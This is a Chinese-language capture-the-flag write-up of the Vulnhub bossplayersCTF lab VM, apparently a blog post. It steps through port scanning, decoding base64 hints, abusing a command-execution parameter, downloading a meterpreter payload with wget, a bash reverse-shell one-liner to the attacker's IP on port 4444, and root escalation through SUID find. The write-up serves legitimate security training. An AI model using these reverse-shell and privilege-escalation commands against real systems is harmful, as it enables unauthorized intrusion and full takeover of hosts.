Vulnhub_bossplayersCTF 记录

目录

Vulnhub_bossplayersCTF 记录

经验 & 总结

  • CTF这种东西还是有一些脑洞和约定俗成的东西:
    • 比如多次编码
    • 比如cmd参数传入执行的命令

步骤流水

  • 端口信息搜集nmap -A 192.168.1.109,只开放了80和22端口。

    Vulnhub_bossplayersCTF 记录

  • 访问80端口

    Vulnhub_bossplayersCTF 记录

    • 查看页面源代码,尝试base64解码ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K

      Vulnhub_bossplayersCTF 记录

  • 探查robots.txt,解码之后为lol try harder bro

    Vulnhub_bossplayersCTF 记录

  • 常用路径探测

    Vulnhub_bossplayersCTF 记录

  • 对index.html页面的注释多次base64解码后发现提示

    Vulnhub_bossplayersCTF 记录

  • 访问页面:

    Vulnhub_bossplayersCTF 记录

    思路:利用ping command执行系统命令,下载木马,然后提权

  • 经提示发现命令执行接口

    Vulnhub_bossplayersCTF 记录

  • 确认存在wget,同时命令中可以输入空格

    Vulnhub_bossplayersCTF 记录

  • 尝试通过wget下载msf的linux/x64/meterpreter/reverse_tcp,但是无法添加执行权限
    Vulnhub_bossplayersCTF 记录

  • 尝试通过bash脚本执行回连操作bash -i >& /dev/tcp/192.168.1.108/4444 0>&1

    Vulnhub_bossplayersCTF 记录

  • 为之前上传的meterpreter程序添加执行权限,得到meterpreter会话

    Vulnhub_bossplayersCTF 记录
    Vulnhub_bossplayersCTF 记录

  • 尝试访问root目录,被拒绝

    Vulnhub_bossplayersCTF 记录

  • 查找有suid权限的程序:

    Vulnhub_bossplayersCTF 记录

  • 利用find获得高权限shell:find . -exec /bin/bash -p \; -quit

    Vulnhub_bossplayersCTF 记录

上一篇:[vulnhub] callme


下一篇:Vulnhub实战靶场:DC-2